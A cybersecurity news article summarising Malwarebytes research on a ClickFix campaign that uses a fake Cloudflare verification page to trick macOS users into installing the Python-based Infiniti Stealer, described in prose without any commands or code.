March 28, 2026

Cloudflare ClickFix Malware Attack Exposes Macs to Infiniti Stealer

Vaibhav March 28, 2026
Cloudflare-ClickFix-Malware-Attack-Exposes-Macs-to-Infiniti-Stealer
Post Views: 5

Malware Researchers Discover Novel Clickjacking Technique Dubbed ClickFix

Malwarebytes researchers have uncovered a sophisticated clickjacking technique called ClickFix, which uses a Cloudflare-themed verification page to distribute a Python-based information stealer targeting macOS users.

ClickFix Campaign Details

  • The attack begins with a fake CAPTCHA page presenting a legitimate-looking Cloudflare human verification page, asking victims to paste and execute a command in Terminal.
  • This social engineering tactic exploits user trust, encouraging them to run a seemingly harmless command.
  • The command executed fetches a Bash script from a remote server, which decodes an embedded payload, writes it to a temporary folder, removes the quarantine flag, and executes it.

Infiniti Stealer Malware

The final payload is the Infiniti Stealer malware, a Python-based information stealer that targets:

  • Browser credentials
  • Keychain information
  • Cryptocurrency wallets
  • Secrets stored in developer files
  • Screenshots captured during execution

Attack Mechanism

According to Malwarebytes, “The malware sends the collected data to a Command and Control (C2) server via HTTP POST requests. After completing the operation, the malware sends a notification to a Telegram channel and queues captured credentials to be cracked on the server.”

Evading Detection

The Infiniti Stealer employs randomized execution delays and checks if the system is a known analysis environment to evade detection.

Implications

Malwarebytes notes that Infiniti Stealer demonstrates how techniques initially used on Windows systems, such as ClickFix, are now being adapted to target Mac users. The use of Python compilation into native binaries makes the malware harder to detect and analyze.

As this approach becomes more prevalent, it may lead to further adaptations in future attacks, emphasizing the importance of staying vigilant and regularly updating software and systems to prevent potential vulnerabilities.



About Author

Vaibhav

See author's posts

More Stories

Telangana-Busts-138-Crore-China-Linked-Currency-Smuggling-Racket-13-Arrested

Telangana Busts ₹138 Crore China-Linked Currency Smuggling Racket, 13 Arrested

Vaibhav March 28, 2026
Big-IP-APM-Remote-Code-Execution-Vulnerability-Exploited-by-Attackers-CVE-2025-53521

Big-IP APM Remote Code Execution Vulnerability Exploited by Attackers CVE-2025-53521

Vaibhav March 28, 2026
India-Cyber-Fraud-Case-Bombay-High-Court-Judge-Loses-Large-Sum-to-Online-Scam

India Cyber Fraud Case: Bombay High Court Judge Loses Large Sum to Online Scam

Vaibhav March 28, 2026

Latest Cyber Security News

Punjab-Police-Probe-Online-Fraud-Case-Involving-Retired-ITBP-Official

Punjab Police Probe Online Fraud Case Involving Retired ITBP Official

Vaibhav March 28, 2026
Telangana-Busts-138-Crore-China-Linked-Currency-Smuggling-Racket-13-Arrested

Telangana Busts ₹138 Crore China-Linked Currency Smuggling Racket, 13 Arrested

Vaibhav March 28, 2026
Cloudflare-ClickFix-Malware-Attack-Exposes-Macs-to-Infiniti-Stealer

Cloudflare ClickFix Malware Attack Exposes Macs to Infiniti Stealer

Vaibhav March 28, 2026
Big-IP-APM-Remote-Code-Execution-Vulnerability-Exploited-by-Attackers-CVE-2025-53521

Big-IP APM Remote Code Execution Vulnerability Exploited by Attackers CVE-2025-53521

Vaibhav March 28, 2026
India-Cyber-Fraud-Case-Bombay-High-Court-Judge-Loses-Large-Sum-to-Online-Scam

India Cyber Fraud Case: Bombay High Court Judge Loses Large Sum to Online Scam

Vaibhav March 28, 2026
en_USEnglish
en_USEnglish